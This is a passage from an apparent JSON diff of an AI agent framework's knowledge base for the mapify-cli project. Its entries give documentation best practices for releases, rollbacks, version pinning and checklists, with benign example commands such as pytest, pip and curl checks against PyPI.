80% → Verify: `pytest --cov --cov-report=term | grep TOTAL | awk '{print $4}' | grep -E '^(8[0-9]|9[0-9]|100)%$'`\n- ✅ Exit code 0 → Verify: `pytest; echo $?` equals `0`\n\n### Example: Package Verification (Async Systems)\n\n```bash\n# Time-aware verification for distributed systems\nsleep 120 # Wait for PyPI indexing\ncurl -f https://pypi.org/project/mapify-cli/1.0.1/ && echo \"✅ VERIFIED\" || echo \"❌ FAILED\"\npip index versions mapify-cli | grep -q 1.0.1 && echo \"✅ INDEXED\" || echo \"❌ NOT FOUND\"\n```\n\n**Expected Results**:\n- ✅ HTTP 200 response → Verify: `curl -f URL` (exit 0)\n- ✅ Version 1.0.1 appears in index → Verify: `pip index versions PKG | grep -q VERSION`\n\n## Documentation CI/CD Pipeline\n\n```yaml\n# .github/workflows/docs-verification.yml\n- name: Verify documentation examples\n run: |\n # Extract and execute verification commands from docs\n grep -A 5 \"Expected Results\" RELEASING.md | grep \"Verify:\" | while read cmd; do\n eval \"$cmd\" || exit 1\n done\n```\n```", - "tags": [ - "documentation", - "testing", - "verification", - "ci-cd", - "binary-criteria", - "automation", - "bash", - "programmatic" - ], - "related_bullets": [ - "doc-0005", - "impl-0027", - "test-0002" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0009", - "content": "Consequence Documentation for Rollback Procedures: When documenting rollback/recovery procedures for distributed systems, explicitly document blast radius with concrete consequences using ✅/❌ markers. Structure: (1) Rollback command, (2) What DOES revert (✅ markers), (3) What DOES NOT revert (❌ markers with persistence explanation), (4) Impact on dependent systems. This prevents dangerous assumptions during incident response - operators understand exactly what rollback achieves vs what requires manual cleanup. Pattern: PyPI package yank documented with 3 explicit consequences ('pip install PKG will skip' ✅, 'pip install PKG==VER still works' ✅, 'Package files remain available' ✅). Non-reversible operations (database migrations, external API state) require consequence documentation to prevent data loss from incorrect rollback assumptions.", - "code_example": "```markdown\n## Rollback Procedures\n\n### Scenario 2: Package Published to PyPI with Bug\n\n#### Option A: Yank the Release (Recommended)\n\n**Command**:\n```bash\n# Via PyPI web interface (no CLI equivalent)\n# 1. Navigate to https://pypi.org/manage/project/mapify-cli/release/1.0.1/\n# 2. Click \"Options\" → \"Yank release\"\n# 3. Provide reason: \"Critical bug in config parser\"\n```\n\n**Consequences** (blast radius documentation):\n\n✅ **What DOES Change:**\n- `pip install mapify-cli` will skip v1.0.1 (resolves to latest non-yanked)\n- PyPI UI shows \"Yanked\" label on release page\n- Release marked as unsuitable for new installations\n\n✅ **What PERSISTS (Does NOT revert):**\n- `pip install mapify-cli==1.0.1` still works (explicit version bypasses yank)\n- Package files remain downloadable (tar.gz, wheel)\n- Existing installations are NOT affected (no force-uninstall)\n- Git tag v1.0.1 still exists (PyPI yank != git rollback)\n\n❌ **What Requires Manual Cleanup:**\n- Documentation referencing v1.0.1 (update to v1.0.2)\n- CI/CD pipelines pinned to v1.0.1 (update pins)\n- User support tickets (proactive communication)\n\n**Dependent System Impact**:\n- Downstream projects with `mapify-cli>=1.0.0` → Will skip 1.0.1, use 1.0.2\n- Downstream projects with `mapify-cli==1.0.1` → Still broken, require manual update\n- Docker images with `pip install mapify-cli==1.0.1` → Still build, contain bug\n```", - "tags": [ - "documentation", - "rollback", - "incident-response", - "distributed-systems", - "blast-radius", - "consequences", - "pypi", - "releases", - "recovery" - ], - "related_bullets": [ - "doc-0005", - "impl-0008" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0010", - "content": "Dual-Mode Documentation: Learning vs Execution: For complex workflows (releases, deployments, migrations), provide both learning mode (detailed explanations) and execution mode (consolidated runbook) in single document. Structure: (1) Main sections with detailed explanations, multiple examples, rationale, troubleshooting (learning mode - first-time users), (2) Appendix with consolidated command sequence, no explanations, copy-pasteable (execution mode - repeat operators). Learning mode frontloads cognitive investment (understand workflow), execution mode minimizes friction (run workflow quickly). Pattern proven: RELEASING.md with 8 detailed sections (350 lines) + appendix runbook (32-line command sequence). Separation prevents expert users from scrolling through explanations while preserving learning context for novices. Use clear section headers ('Appendix: Release Workflow Reference') to signal mode switch.", - "code_example": "```markdown\n# Release Process Documentation\n\n## 1. Pre-Release Checklist (LEARNING MODE)\n\nBefore starting the release process, verify all requirements are met.\n\n### 1.1 Code Quality Checks\n\n**Why**: Ensures production-ready code quality before tagging release.\n\n**How**:\n```bash\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\nblack src/ tests/ --check\nruff check src/ tests/\n```\n\n**Expected Results**:\n- ✅ All tests pass (100% success rate)\n- ✅ No linting errors\n\n**Troubleshooting**:\n- If tests fail: Fix failing tests before proceeding\n- If linter errors: Run `black src/ tests/` to auto-format\n\n### 1.2 Documentation Review\n\n**Why**: Users rely on accurate installation instructions.\n\n**How**:\n```bash\ngrep -A 20 \"## \\\\[Unreleased\\\\]\" CHANGELOG.md\n```\n\n**Expected Results**:\n- ✅ CHANGELOG.md has [Unreleased] section with all changes\n\n## 2. Version Bumping (LEARNING MODE)\n\n### Semantic Versioning\n\nMAP Framework follows [Semantic Versioning 2.0.0](https://semver.org/):\n- **MAJOR** (X.0.0): Breaking changes\n- **MINOR** (x.Y.0): New features\n- **PATCH** (x.y.Z): Bug fixes\n\n### Version Bump Script\n\n**Usage**:\n```bash\n./scripts/bump-version.sh patch # or minor/major\n```\n\n**What it does**:\n1. Validates version format\n2. Updates pyproject.toml\n3. Updates CHANGELOG.md\n4. Creates git commit and tag\n\n---\n\n## Appendix: Release Workflow Reference (EXECUTION MODE)\n\n**Use this for repeat releases - copy-paste command sequence.**\n\n```bash\n# Pre-checks\ngit checkout main && git pull origin main\ngit status # Must be clean\npytest tests/ --cov && black src/ tests/ --check && ruff check src/ tests/\ngrep -A 20 \"## \\\\[Unreleased\\\\]\" CHANGELOG.md # Verify changes documented\n\n# Version bump\n./scripts/bump-version.sh patch # or minor/major\ngit show # Review commit\n\n# Push and release\ngit push origin main\ngit push origin v1.0.1 # Replace with actual version\ngh release create v1.0.1 \\\n --title \"MAP Framework v1.0.1\" \\\n --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\n\n# Monitor and verify\ngh run watch\nsleep 120\npip index versions mapify-cli | grep 1.0.1 # Verify PyPI indexing\n```\n\n**Execution checklist** (binary verification):\n- [ ] All pre-checks passed (no errors)\n- [ ] Git push succeeded (no rejections)\n- [ ] GitHub release created (check URL)\n- [ ] CI/CD workflow passed (gh run watch shows success)\n- [ ] PyPI package indexed (pip index returns 1.0.1)\n```", - "tags": [ - "documentation", - "dual-mode", - "runbooks", - "learning", - "execution", - "workflows", - "releases", - "user-experience", - "progressive-disclosure" - ], - "related_bullets": [ - "doc-0005", - "doc-0002", - "doc-0007" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0011", - "content": "Temporal Risk Management in Pre-Release Documentation: When documenting unreleased functionality (pre-PyPI packages, pending features, upcoming APIs), use Predictor agent to analyze temporal dependencies and create rollout checklists. Temporal risks include advertising non-existent packages (README says 'pip install' before PyPI publish), referencing unreleased API versions, or documenting features gated behind feature flags. Structure: (1) Identify temporal claims (uses future-tense or version-specific language), (2) Map claims to release blockers (e.g., 'pip install' requires PyPI publish), (3) Create pre-publish checklist with binary verification (e.g., 'curl -f https://pypi.org/project/PKG/ && echo LIVE'). Pattern prevents user frustration from following documentation that references unavailable functionality. Proven: Predictor flagged HIGH risk when README advertised PyPI package before publish workflow completed.", - "code_example": "```markdown\n## Temporal Risk Analysis Example\n\n### Documentation Claim (Temporal)\n```markdown\n# README.md (pre-release draft)\n## Installation\n\n```bash\npip install mapify-cli\n```\n```\n\n### Risk Analysis (Predictor Output)\n\n**Temporal Dependency Detected**:\n- Claim: \"pip install mapify-cli\" (present tense, implies currently available)\n- Reality: Package not published to PyPI yet (release workflow not run)\n- Risk Level: HIGH (users will encounter 404 errors)\n\n**Rollout Checklist** (binary verification):\n```bash\n# Pre-publish: Verify package does NOT exist yet\ncurl -f https://pypi.org/project/mapify-cli/ && echo \"⚠️ ALREADY LIVE\" || echo \"✅ Not published yet\"\n\n# Post-publish: Verify package is indexed\nsleep 120 # PyPI indexing delay\ncurl -f https://pypi.org/project/mapify-cli/ && echo \"✅ LIVE\" || echo \"❌ NOT INDEXED\"\npip index versions mapify-cli | grep -q 1.0.0 && echo \"✅ INSTALLABLE\" || echo \"❌ NOT FOUND\"\n```\n\n### Mitigation Strategy\n\n**Option A - Version Pin Documentation to Release**:\nOnly add \"pip install\" section AFTER PyPI publish verified.\n\n**Option B - Future-Tense Documentation**:\n```markdown\n## Installation (Available After v1.0.0 Release)\n\nOnce released to PyPI, install via:\n```bash\npip install mapify-cli\n```\n\n*Note: Pre-release installation requires git clone (see Development Setup)*\n```\n```", - "tags": [ - "documentation", - "temporal-risk", - "pre-release", - "predictor", - "pypi", - "rollout", - "verification", - "releases" - ], - "related_bullets": [ - "doc-0005", - "doc-0007" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0012", - "content": "Progressive Complexity Installation Documentation: Structure installation sections using progressive disclosure from simple (recommended path) to advanced (expert configurations), with explicit user segmentation labels. Three complexity tiers: (1) Simple - single command for mainstream use case (pip install, no options), labeled 'Recommended' or 'Quick Start', (2) Intermediate - installation with optional features (pip install PKG[extras], version pinning), labeled 'Common Use Cases', (3) Advanced - development setup, custom builds, security configurations, labeled 'Advanced Setup'. Each tier references next tier for users needing more control. Pattern proven: README with simple→intermediate→advanced progression achieved 9.1/10 Evaluator score with praise for 'progressive complexity design'. Prevents overwhelming novice users while providing expert users path to customization. Use collapsible sections (
) or clear tier headers.", - "code_example": "```markdown\n## Installation\n\n### Recommended (Simple Tier)\n\nFor most users, install the latest stable release:\n\n```bash\npip install mapify-cli\n```\n\nThat's it! Verify installation: `mapify --version`\n\n*Need more control over versions or want to contribute? See Common Use Cases and Advanced Setup below.*\n\n---\n\n### Common Use Cases (Intermediate Tier)\n\n
\nInstall Specific Version\n\n**Exact version** (reproducible builds):\n```bash\npip install mapify-cli==1.0.1\n```\n\n**Version range** (patch updates only):\n```bash\npip install \"mapify-cli>=1.0.0,<1.1.0\"\n```\n\nSee [Semantic Versioning Guide](#semver-explanation) for pinning strategies.\n\n
\n```", - "tags": [ - "documentation", - "progressive-complexity", - "installation", - "user-segmentation", - "markdown", - "collapsible-sections", - "user-experience", - "pip" - ], - "related_bullets": [ - "doc-0002", - "doc-0010" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0013", - "content": "Cross-Reference Architecture for Documentation Depth: Build documentation as interconnected layers where README (entry point) provides overview with explicit links to specialized documentation (deeper dive), which links to reference documentation (exhaustive detail). Three-tier pattern: (1) README - 80/20 coverage, most common use cases, links to tier 2 for edge cases, (2) Specialized docs - feature-specific guides (RELEASING.md, CONTRIBUTING.md, ARCHITECTURE.md), comprehensive workflows, links to tier 3 for API details, (3) Reference docs - API docs, module docstrings, exhaustive parameter lists. Use explicit cross-reference phrases ('See RELEASING.md for complete workflow', 'For API details, see [module reference]'). Pattern prevents README bloat (information overload) while ensuring users can navigate to depth they need. Proven: Evaluator praised 'excellent cross-referencing strategy' for README linking to RELEASING.md, CONTRIBUTING.md, API reference.", - "code_example": "```markdown\n### Tier 1: README.md (Entry Point)\n\n```markdown\n## Quick Start\n\n```bash\npip install mapify-cli\nmapify init\n```\n\n*For complete installation options, see [INSTALL.md](docs/INSTALL.md).*\n\n## Architecture\n\nMAP uses 6 core agents: Actor, Monitor, Evaluator...\n\n*For architectural deep dive, see [ARCHITECTURE.md](docs/ARCHITECTURE.md).*\n```\n```", - "tags": [ - "documentation", - "cross-reference", - "architecture", - "three-tier", - "readme", - "specialized-docs", - "api-reference", - "navigation", - "information-architecture" - ], - "related_bullets": [ - "doc-0006", - "doc-0010" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0014", - "content": "Version Management Documentation with Dynamic References: Use placeholder patterns and dynamic sources for version references in user-facing documentation to minimize maintenance burden during version bumps. Five strategies: (1) Generic 'latest' references for non-critical contexts ('pip install PKG' without version), (2) Fail-loud placeholder variables for version-specific examples ({{VERSION}} in templates - MUST use {{DOUBLE_BRACE}} syntax, not [BRACKETS] or ALLCAPS, because double-braces break grep if incomplete and follow templating conventions), (3) Placeholder verification instructions (find-replace checklist + 'grep returns 0 results' validation), (4) Dynamic badges linking to PyPI/GitHub APIs for current version display, (5) '--version command' references instead of hardcoded version strings. Reserve exact version pins (PKG==1.0.1) for reproducibility-critical contexts (Docker, CI/CD, security advisories). Pattern proven: Evaluator praised 'future-proof examples' for README avoiding hardcoded versions. Fail-loud placeholders reduce substitution errors where {{VERSION}} remains in published docs.", - "code_example": "```markdown\n### Strategy 2: Fail-Loud Placeholders (Template Mode)\n\n## Before Starting Release\nReplace all version placeholders:\n1. Find-replace: {{VERSION}} → 1.2.3 (double-brace syntax)\n2. Verify complete: `grep '{{VERSION}}' docs/` → 0 results\n3. If grep finds matches → substitution incomplete (FAIL LOUD)\n\n### Installation (Template Example)\n\n```bash\npip install mapify-cli=={{VERSION}} # ✅ Breaks grep if incomplete\n```\n\n❌ BAD - Silent failure:\n```bash\npip install mapify-cli==[VERSION] # Completes grep check even if [VERSION] remains\npip install mapify-cli==VERSION # grep 'VERSION' finds many false positives\n```\n\n### Strategy 3: Placeholder Verification\n\n```bash\n# Verification checklist\n- [ ] Replace {{VERSION}} with actual version (e.g., 1.2.3)\n- [ ] Run: grep '{{VERSION}}' docs/ release-checklist.md\n- [ ] Expected: 0 results (no matches)\n- [ ] If matches found: substitution incomplete, DO NOT PROCEED\n```\n\n### Strategy 4: Dynamic Badges (API-Driven)\n\n[![PyPI version](https://badge.fury.io/py/mapify-cli.svg)](https://pypi.org/project/mapify-cli/)]\n\n### Strategy 5: Command References (Runtime)\n\n```bash\nmapify --version # ✅ Returns current version\n```\n```", - "tags": [ - "documentation", - "version-management", - "dynamic-references", - "placeholders", - "badges", - "pip", - "maintenance", - "automation", - "releases" - ], - "related_bullets": [ - "doc-0006", - "doc-0005" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0015", - "content": "Semantic Versioning Education in User Documentation: Include educational context explaining semantic versioning (semver) implications when documenting version pinning strategies. Users often pin versions incorrectly (too restrictive or too permissive) without understanding trade-offs. Provide decision matrix: (1) Exact pin (PKG==1.0.1) - maximum reproducibility, no updates including security patches, use for Docker/CI, (2) Patch range (PKG~=1.0.1 or >=1.0.1,<1.1.0) - security updates allowed, breaking changes blocked, use for applications, (3) Minor range (PKG>=1.0.0,<2.0.0) - new features allowed, major version breakage blocked, use for libraries, (4) Unpinned (PKG) - always latest, automatic updates, use for local development. Link to semver.org for specification details. Pattern proven: Monitor caught MEDIUM gap (missing semver explanation), fix adding decision matrix improved understanding and reduced support questions.", - "code_example": "```markdown\n## Semantic Versioning Guide\n\nVersion format: MAJOR.MINOR.PATCH (e.g., 1.4.2)\n\n| Strategy | Syntax | Updates | Use Case |\n|----------|--------|---------|----------|\n| **Exact** | `==1.0.1` | None | Docker, CI |\n| **Patch** | `~=1.0.1` | 1.0.x only | Production |\n| **Minor** | `>=1.0,<2.0` | 1.x.x | Libraries |\n| **Unpinned** | (none) | Latest | Dev |\n\n**Security Advisory Example**:\n- Exact pin (`==1.0.0`): ❌ Vulnerable until manual update\n- Patch range (`~=1.0.0`): ✅ Auto-updates to 1.0.1 (patched)\n```", - "tags": [ - "documentation", - "semantic-versioning", - "semver", - "education", - "version-pinning", - "pip", - "dependencies", - "security", - "user-education", - "decision-matrix" - ], - "related_bullets": [ - "doc-0012", - "doc-0014" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0016", - "content": "Risk-Responsive Documentation Design: For high-stakes procedural documentation (releases, deployments, disaster recovery, incident response), apply Predictor-driven risk mitigation when estimated risk score ≥5.0/10 (MEDIUM or HIGH). Systematically apply layered defenses targeting specific Predictor-identified failure modes: fail-loud placeholders (prevent incomplete substitution), time estimates (combat completion anxiety), emoji markers (highlight irreversible operations), sync comments (prevent multi-file drift). Each mitigation addresses distinct cognitive or process failure. Pattern proven: Subtask 8 release checklist applied 5 mitigations, reduced Predictor risk from 5.2/10 (MEDIUM) to ~3.5/10 (LOW), estimated quality improvement 8.1→9.0/10. Applicable beyond software releases: database migrations requiring rollback plans, production deployments with verification gates, security incident response procedures. Risk-responsive design transforms documentation from passive reference to active safety system.", - "code_example": "```markdown\n\n# Release Checklist\n\n## Pre-Release\n- [ ] Run tests\n- [ ] Update CHANGELOG\n- [ ] Bump version in files\n- [ ] Push tag\n- [ ] Create release\n\n\n# Release Checklist v{{VERSION}}\n\n## Before Starting (~5 min)\n⚠️ CRITICAL: Replace all {{VERSION}} placeholders:\n1. Find-replace: {{VERSION}} → 1.2.3\n2. Verify: `grep '{{VERSION}}' release-checklist.md` → 0 results\n3. If grep finds matches → STOP, substitution incomplete\n\n## Phase 1: Pre-Release (~30-45 min)\n- [ ] Run test suite: `pytest --cov` (expected: 100% pass)\n- [ ] Update CHANGELOG.md with release notes\n- [ ] Bump version: `./scripts/bump-version.sh patch`\n- [ ] ⚠️ IRREVERSIBLE: Push tag v{{VERSION}} to origin\n\n## Phase 2: Release Creation (~15-20 min)\n- [ ] ⚠️ PRODUCTION: Create GitHub release (triggers CI/CD)\n- [ ] Monitor workflow: `gh run watch`\n\n\n\n\nTotal time: ~60-90 minutes\n\nMitigations applied:\n1. {{VERSION}} fail-loud placeholder (prevents incomplete substitution)\n2. Time estimates per phase (combats completion anxiety)\n3. ⚠️ emoji markers for irreversible ops (5-10% of items)\n4. Expected results (binary verification)\n5. Sync comments (prevents doc drift)\n```", - "tags": [ - "documentation", - "risk-mitigation", - "predictor", - "checklists", - "high-stakes", - "cognitive-load", - "safety", - "releases", - "deployments" - ], - "related_bullets": [ - "doc-0005", - "doc-0010", - "doc-0014" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0017", - "content": "Dual-Channel Critical Operation Markers: In long procedural checklists (50+ items, 6+ phases), use dual-channel markers for high-consequence operations: emoji ⚠️ visual marker + textual severity label (CRITICAL/IRREVERSIBLE/DESTRUCTIVE/PRODUCTION). Limit to 5-10% of total items to preserve signal strength. Dual-channel design works because: (1) Emoji provides rapid visual scanning (pre-attentive processing), (2) Textual label provides semantic precision (what type of consequence), (3) Redundant encoding survives degraded viewing conditions (terminal without emoji support, printed documentation). Reserve markers for operations with irreversible consequences (git push tags, production deployments, database drops, API key rotation) or high-impact failures (OIDC setup errors block release, incorrect version breaks semver). Overuse dilutes signal (checkbox fatigue). Pattern proven: Subtask 8 release checklist marked 3 of 30 items (~10%) with ⚠️ IRREVERSIBLE, Evaluator scored 8.1/10. Applicable to: disaster recovery procedures, production deployment checklists, incident response runbooks, privilege escalation workflows.", - "code_example": "```markdown\n\n## Release Process\n- [ ] Run tests\n- [ ] Update docs\n- [ ] Push tag to origin (triggers release workflow)\n- [ ] Create GitHub release\n- [ ] Monitor CI/CD\n- [ ] Verify PyPI upload\n\n\n## Release Process\n- [ ] Run tests: `pytest --cov`\n- [ ] Update docs: verify CHANGELOG.md\n- [ ] ⚠️ IRREVERSIBLE: Push tag v1.2.3 to origin\n - Once pushed, tag triggers automated release workflow\n - Cannot unpublish from PyPI after upload\n - Verify version is correct BEFORE pushing\n- [ ] ⚠️ PRODUCTION: Create GitHub release\n - Triggers CI/CD pipeline to build and publish to PyPI\n - Visible to all users immediately\n- [ ] Monitor workflow: `gh run watch`\n- [ ] Verify upload: `pip index versions mapify-cli | grep 1.2.3`\n```", - "tags": [ - "documentation", - "checklists", - "cognitive-load", - "emoji", - "markers", - "critical-operations", - "dual-channel", - "user-experience", - "releases", - "incident-response" - ], - "related_bullets": [ - "doc-0005", - "doc-0016" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0018", - "content": "Time Estimates for Checkbox Fatigue: For procedural checklists exceeding 30 items or 6 distinct phases, add time estimates per phase (~MIN-MAX min format) and total workflow time. Time estimates combat three cognitive failures: (1) Unknown completion anxiety (users unsure if checklist takes 10 min or 2 hours, hesitate to start), (2) Unrealistic scheduling (users allocate insufficient time, get interrupted mid-workflow, lose context), (3) Progress tracking failure (no milestones, unknown if on pace). Format: phase header with time range (~30-45 min), total at document top (~60-90 min). Use ranges not point estimates to account for variability (first-time vs repeat execution, system differences). Estimate conservatively (80th percentile completion time, not median). Pattern proven: Subtask 8 release checklist added time estimates, Evaluator noted 'realistic time budgeting' as quality signal. Applicable to: installation procedures, deployment checklists, troubleshooting workflows, data migration runbooks. Avoid for non-linear workflows (exploratory debugging, research tasks) where time estimates create false precision.", - "code_example": "```markdown\n\n# Database Migration Checklist\n\n## Pre-Migration Validation\n- [ ] Backup production database\n- [ ] Verify backup integrity\n- [ ] Test migration on staging\n\n## Migration Execution\n- [ ] Enable maintenance mode\n- [ ] Run migration script\n- [ ] Verify data integrity\n\n\n# Database Migration Checklist\n\n**Total estimated time: ~90-120 minutes** (first-time: 120-150 min)\n\n## Phase 1: Pre-Migration Validation (~30-40 min)\n- [ ] Backup production database: `pg_dump` (~15-20 min for 10GB DB)\n- [ ] Verify backup integrity: `pg_restore --list` (~2-3 min)\n- [ ] Test migration on staging: `./migrate.sh staging` (~10-15 min)\n\n## Phase 2: Migration Execution (~40-60 min)\n- [ ] Enable maintenance mode: `./maintenance.sh on` (~1 min)\n- [ ] Run migration script: `./migrate.sh production` (~30-45 min)\n- [ ] Verify data integrity: `./verify-migration.sh` (~5-10 min)\n```", - "tags": [ - "documentation", - "checklists", - "time-estimates", - "cognitive-load", - "completion-anxiety", - "scheduling", - "user-experience", - "migrations", - "deployments" - ], - "related_bullets": [ - "doc-0010", - "doc-0016", - "doc-0017" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0019", - "content": "Multi-File Documentation Sync Comments: For multi-file consistency requirements (release checklist ↔ release guide, API reference ↔ implementation, schema docs ↔ migration guide), add bidirectional HTML sync comments at top of BOTH files. Format: . Sync comments transform documentation drift from invisible accident to intentional choice by: (1) Making drift visible in git diff (comment appears in context), (2) Catchable in code review (reviewer sees sync reminder), (3) Explicit rationale (why files must stay synchronized). Without sync comments, multi-file consistency relies on author memory (fails after 2+ weeks) or institutional knowledge (lost when authors leave). Comments are HTML (invisible in rendered markdown), version-controlled (tracked in git history), bidirectional (both files reference each other to catch partial updates). Pattern proven: Subtask 8 added sync comments between RELEASING.md ↔ release-checklist.md, reduced Predictor risk score. Applicable to: API reference ↔ SDK implementation docs, database schema ↔ migration guides, CLI help text ↔ user manual, disaster recovery procedure ↔ runbook checklist.", - "code_example": "```markdown\n\n\n\n# Release Process Guide\n\n## Pre-Release Validation\n\n1. **Test Suite**: Run full test suite locally:\n ```bash\n pytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n ```\n Expected: 100% test pass rate, coverage ≥85%.\n\n\n\n\n# Release Checklist v{{VERSION}}\n\n## Phase 1: Pre-Release (~30-45 min)\n\n- [ ] Run test suite:\n ```bash\n pytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n ```\n Expected: ✅ 100% pass, coverage ≥85%\n```", - "tags": [ - "documentation", - "multi-file", - "consistency", - "sync", - "html-comments", - "drift-prevention", - "code-review", - "git", - "maintenance" - ], - "related_bullets": [ - "doc-0003", - "doc-0004", - "doc-0016" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0020", - "content": "Agent Template Decision Aids: When adding new fields/sections to agent templates, include decision tables or checklists to guide agents in populating fields correctly. Example: test_strategy field needs 'Test Layer Decision Table' showing what tests are required for each subtask type. Structure: rows = scenarios (subtask types, complexity levels), columns = field sub-values (unit/integration/E2E required/optional/N/A), cells = specific guidance. Place decision table immediately after field definition, before examples section. This prevents field misuse and calibrates agent judgment across different contexts.", - "code_example": "```markdown\n# ❌ INCORRECT - Field without decision aid\n### test_strategy (required)\nDescribe what tests are needed for this subtask.\n\n# ✅ CORRECT - Field with decision table\n### test_strategy (required)\nDescribe what tests are needed for this subtask.\n\n**Test Layer Decision Table**:\n\n| Subtask Type | Unit Tests | Integration Tests | E2E Tests |\n|-------------|-----------|------------------|-----------|\n| **Data Model** | **REQUIRED**: Field validation, defaults | **REQUIRED**: FK integrity | **N/A** - model only |\n| **API Endpoint** | **REQUIRED**: Request validation | **REQUIRED**: Service calls | **REQUIRED**: Full HTTP flow |\n| **Utility Function** | **REQUIRED**: Pure function tests | **N/A** - no external deps | **N/A** - not user-facing |\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196271Z", - "last_used_at": null, - "related_to": [ - "arch-0004" - ], - "tags": [ - "agent-templates", - "decision-aids", - "documentation-pattern", - "usability", - "tables" - ] - }, - { - "id": "doc-0021", - "content": "Complexity Ladder Examples for Scoring Systems: When introducing numeric scoring systems (1-10 scales, complexity ratings), provide 'ladder examples' showing what each score looks like for domain-specific scenarios. Prevents score inflation/deflation and calibrates agents. Create 3-5 examples spanning the scoring range (low/medium/high). Each example: (1) Score with label (Simple/Moderate/Complex), (2) Concrete scenario from project domain, (3) Justification linking scenario to scoring criteria with arithmetic. Update examples as project evolves to reflect actual complexity distribution observed in completed subtasks.", - "code_example": "```markdown\n# ❌ INCORRECT - Abstract scoring guide\ncomplexity_score: Rate 1-10 based on task difficulty.\n\n# ✅ CORRECT - Calibrated ladder examples\ncomplexity_score: Rate 1-10 based on task difficulty.\n\n**Complexity Ladder (1-10 Scale)**:\n\n- **Score 2 (Simple)**: Add logging statement to existing function\n - *Rationale*: Base 1 (trivial change) + 1 (requires understanding function context)\n\n- **Score 5 (Moderate)**: Add new field to Django model with foreign key\n - *Rationale*: Base 3 (CRUD) + 1 (foreign key) + 1 (migration complexity)\n\n- **Score 8 (Complex)**: Implement caching layer with Redis\n - *Rationale*: Base 5 (new subsystem) + 1 (external dependency) + 1 (invalidation logic) + 1 (monitoring)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196282Z", - "last_used_at": null, - "related_to": [ - "doc-0020" - ], - "tags": [ - "scoring-systems", - "calibration", - "documentation-pattern", - "examples", - "agent-templates" - ] - }, - { - "id": "doc-0022", - "content": "Exit Code Documentation Hierarchy for CLI Tools: Prioritize documentation tiers by user impact - Tier 1 (CRITICAL): Primary user docs (USAGE.md, API reference) specify exit code contract for CI/CD automation; Tier 2 (IMPORTANT): Secondary docs (README.md examples) show common exit scenarios; Tier 3 (NICE-TO-HAVE): Inline help (--help output) provides quick reference. DO NOT block deployments on Tier 3 issues if Tier 1 is correct and complete. Pattern proven: Subtask 7 iteration 2 spent effort on --help text formatting (Tier 3) when USAGE.md exit codes (Tier 1) were already verified and accurate. Tier 1 correctness enables production automation - prioritize ruthlessly.", - "code_example": "```markdown\n# Tier 1: USAGE.md (API Contract)\n## Exit Codes\n- 0: Success\n- 1: Failure\n\n# Tier 2: README.md (Examples)\n```bash\nmap-cli cmd || exit 1\n```\n\n# Tier 3: --help (Quick Reference)\n```\nUsage: map-cli \n```\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T13:12:08.809242Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "doc-0002", - "doc-0005", - "doc-0003" - ], - "tags": [ - "cli-tools", - "exit-codes", - "documentation-hierarchy", - "prioritization", - "ci-cd", - "api-contract" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0023", - "content": "Comprehensive Volume Creates False Authority: Extensive documentation without accuracy verification is MORE dangerous than incomplete documentation because volume signals authority and suppresses user skepticism. 190-line comprehensive docs with inaccurate exit codes break production CI/CD pipelines - users trust detailed documentation and skip independent verification. Better: Shorter accurate documentation that prompts users to verify edge cases than comprehensive inaccurate documentation that creates false confidence. Pattern proven: Subtask 7 iteration 1 produced 190-line comprehensive USAGE.md scoring 5.9/10 